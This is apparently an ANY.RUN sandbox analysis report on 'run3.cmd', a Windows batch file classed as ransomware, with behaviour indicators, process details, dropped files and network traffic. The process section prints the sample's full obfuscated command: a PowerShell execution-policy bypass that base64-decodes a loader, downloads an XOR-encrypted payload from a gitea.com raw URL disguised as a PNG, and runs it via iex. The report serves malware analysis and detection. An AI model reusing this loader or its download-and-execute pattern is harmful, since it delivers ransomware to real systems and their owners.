File name:

run3.cmd

Full analysis: https://app.any.run/tasks/681a2c6f-b710-47d4-a141-c8b3a2f69c6d
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Malware Trends Tracker     >>>
Analysis date: May 25, 2025, 10:09:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
ransomware
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (1068), with no line terminators
MD5:

4590A50E82568B5F5C5B2100F1BBB9CA

SHA1:

2C4BFA073A601C0B3E3CB700CE27257CFBA6EF53

SHA256:

8E56A67881315E9B11AEA1FB3440CEB96F4B864DC7A62049E440F4FE657D4788

SSDEEP:

24:ZnpXjbS2EnbjzHGnM0IQjFuPsG5JASMMenwTXenRUrKZbFp:vvwruTuPrAzMXTXPAxp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6392)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4424)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4424)

    • Create files in the Startup directory

      • powershell.exe (PID: 4424)

    • Runs injected code in another process

      • powershell.exe (PID: 4424)

    • Application was injected by another process

      • RuntimeBroker.exe (PID: 4528)

    • RANSOMWARE has been detected

      • RuntimeBroker.exe (PID: 4528)

    • Modifies files in the Chrome extension folder

      • RuntimeBroker.exe (PID: 4528)

  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 6392)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7392)
      • csc.exe (PID: 7832)
      • csc.exe (PID: 8052)
      • csc.exe (PID: 8148)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4424)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 6392)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6392)
      • cmd.exe (PID: 5680)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 7392)
      • csc.exe (PID: 7832)
      • powershell.exe (PID: 4424)
      • csc.exe (PID: 8148)
      • csc.exe (PID: 8052)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4424)
      • RuntimeBroker.exe (PID: 4528)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7780)
      • cmd.exe (PID: 7940)
      • cmd.exe (PID: 7984)
      • cmd.exe (PID: 8104)

    • The process executes via Task Scheduler

      • cmd.exe (PID: 5680)

    • Creates file in the systems drive root

      • RuntimeBroker.exe (PID: 4528)

  • INFO

    • Checks supported languages

      • csc.exe (PID: 7392)
      • cvtres.exe (PID: 7412)
      • csc.exe (PID: 7832)
      • cvtres.exe (PID: 7852)
      • csc.exe (PID: 8052)
      • cvtres.exe (PID: 8076)
      • csc.exe (PID: 8148)
      • cvtres.exe (PID: 8168)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 7392)
      • csc.exe (PID: 7832)
      • csc.exe (PID: 8148)
      • csc.exe (PID: 8052)

    • Create files in a temporary directory

      • cvtres.exe (PID: 7412)
      • csc.exe (PID: 7392)
      • csc.exe (PID: 7832)
      • cvtres.exe (PID: 7852)
      • csc.exe (PID: 8052)
      • cvtres.exe (PID: 8168)
      • csc.exe (PID: 8148)
      • cvtres.exe (PID: 8076)

    • Disables trace logs

      • powershell.exe (PID: 4424)

    • Checks proxy server information

      • powershell.exe (PID: 4424)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4424)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 6392)
      • powershell.exe (PID: 4424)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4424)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • cmd.exe (PID: 6392)
      • powershell.exe (PID: 4424)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 4424)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4424)

    • Creates files or folders in the user directory

      • RuntimeBroker.exe (PID: 4528)

    • Creates files in the program directory

      • RuntimeBroker.exe (PID: 4528)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
26
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe sppextcomobj.exe no specs slui.exe no specs csc.exe cvtres.exe no specs svchost.exe cmd.exe no specs attrib.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs attrib.exe no specs cmd.exe no specs attrib.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs attrib.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs THREAT runtimebroker.exe

Process information

PID
CMD
Path
Indicators
Parent process
1116PowerShell.exe (Get-CimInstance -Class Win32_ComputerSystemProduct).UUIDC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2564\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3268\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4424PowerShell -ExecutionPolicy Bypass -Command "iex(-join([Convert]::Frombase64String('JHM9InVzaW5nIFN5c3RlbTtwdWJsaWMgY2xhc3MgSWxJbElsSWxJbElsSWxJbHtwcml2YXRlIHN0YXRpYyBieXRlW11JbElsSWxJbElsbElJbElsPW5ldyBieXRlW117MjEwLDk5LDIxOCwxODMsOTcsNTQsMzIsMjI5LDI4LDE2NSwxNiwyNTEsNzAsMTI4LDE0NSw2MSwxMDksMjUsNjYsMTU0LDI1MiwyMzEsMjQ2LDh9O3B1YmxpYyBzdGF0aWMgdm9pZCBJbElsbElJbGxJSWxJSUlsKGJ5dGVbXUlsSWxsSUlsSWxJbElJSWwpe2ludCBJbElsbElJbElsbElJbElsPUlsSWxsSUlsSWxJbElJSWwuTGVuZ3RoO2ludCBJbElsbElJbElsbElJSUlsPUlsSWxJbElsSWxsSUlsSWwuTGVuZ3RoO2ZvcihpbnQgSWxsSUlJSWxJbElsSUlJbD0wO0lsbElJSUlsSWxJbElJSWw8SWxJbGxJSWxJbGxJSWxJbDsrK0lsbElJSUlsSWxJbElJSWwpSWxJbGxJSWxJbElsSUlJbFtJbGxJSUlJbElsSWxJSUlsXV49SWxJbElsSWxJbGxJSWxJbFtJbGxJSUlJbElsSWxJSUlsJUlsSWxsSUlsSWxsSUlJSWxdO319OyI7QWRkLVR5cGUgJHM7JGI9KG5ldy1vYmplY3QgbmV0LndlYmNsaWVudCkuZG93bmxvYWREYXRhKCdodHRwczovL2dpdGVhLmNvbS9oYXRpa3ZhaC9wcm9qZWN0L3Jhdy9icmFuY2gvbWFpbi9sb2dvMi5wbmcnKTtbSWxJbElsSWxJbElsSWxJbF06OklsSWxsSUlsbElJbElJSWwoJGIpOyRjPVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkYik7aWV4KCRjKQ==') -as [char[]]))" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4528C:\Windows\System32\RuntimeBroker.exe -EmbeddingC:\Windows\System32\RuntimeBroker.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Runtime Broker
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\runtimebroker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\bcrypt.dll
5680C:\WINDOWS\system32\cmd.exe /c PowerShell.exe (Get-CimInstance -Class Win32_ComputerSystemProduct).UUIDC:\Windows\System32\cmd.exeRuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6392C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\run3.cmd" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
7288C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7320"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
14 253
Read events
14 253
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
296
Text files
24
Unknown types
0

Dropped files

PID
Process
Filename
Type
4424powershell.exeC:\Users\admin\AppData\Local\Temp\d2nvpzvw.0.cstext
MD5:628119B776BB5F8635E20BDBD14DC8A9
SHA256:F34F776147FA1E8BEB0485405E1524F544B54719F6216E7888CD06957D3E23C4
4424powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eyxk3gex.bpi.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7392csc.exeC:\Users\admin\AppData\Local\Temp\CSC2DC857EFE4E94BFCAB9FAB5FB752B7B4.TMPbinary
MD5:FF0CE158670D634E40F259968269C9E8
SHA256:20C53A74D34C41C003B61FE658C0991A3AB25540F36FF1FA3D259634CAF26731
4424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\init.cmdtext
MD5:A7C4E5E9C5F65A70F32B1E15EF152146
SHA256:B62167C87660DBFA7F8AFB531B147D3982ECA5D9467077FFE9D3800B8D98C901
4424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\ System\ lIllIlIIlIlIllIl.txttext
MD5:ACCC8D401457898585E613746E2096D7
SHA256:AC0813510448F1596FF22908B1FD6C73DCC51A4F8E3F25B26118AB1FD9D403AF
7412cvtres.exeC:\Users\admin\AppData\Local\Temp\RESC891.tmpbinary
MD5:37A3BB04582D193D8F9CD74D356353BA
SHA256:C0A5AA29FF39CE2916BEDDA9A78EA90EE298B6756CD29F10BD31B039D8061DFF
7392csc.exeC:\Users\admin\AppData\Local\Temp\d2nvpzvw.outtext
MD5:E77E2B9285149D81CCCFC73C4863046F
SHA256:3E09BA9A826137707A0A9198EC819B653BA40BC61E26AA1A21C0F0314E2985AA
4424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\ System\ lIlIIlIIlIIlIlIl.txttext
MD5:A5EA0AD9260B1550A14CC58D2C39B03D
SHA256:F1B2F662800122BED0FF255693DF89C4487FBDCF453D3524A42D4EC20C3D9C04
4424powershell.exeC:\Users\admin\AppData\Local\Temp\i2nfn5no.0.cstext
MD5:944580DA932ED9ED1E1055D6F0790A57
SHA256:9320429EA71FBDDD9C22515191F54FE3D931121E4A125253D13E62DD600144C8
4424powershell.exeC:\Users\admin\AppData\Local\Temp\i2nfn5no.cmdlinetext
MD5:C765C85052D3B074E15286913958FAE9
SHA256:C60F1734221E52D560D3905BEC615C0BBD0D067CC3E4E3C5A96EA261092935C2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
19
DNS requests
14
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
680
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
680
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4424
powershell.exe
34.217.253.146:443
gitea.com
AMAZON-02
US
suspicious
6544
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.16.253.202
whitelisted
google.com
  • 142.250.186.110
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
gitea.com
  • 34.217.253.146
unknown
login.live.com
  • 20.190.160.66
  • 40.126.32.133
  • 20.190.160.65
  • 40.126.32.72
  • 20.190.160.128
  • 40.126.32.140
  • 20.190.160.4
  • 40.126.32.138
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET INFO Self-Hosted Git Service Domain in DNS Lookup (gitea .com)
4424
powershell.exe
Potentially Bad Traffic
ET INFO Observed Self-Hosted Git Service Domain (gitea .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
run3.cmd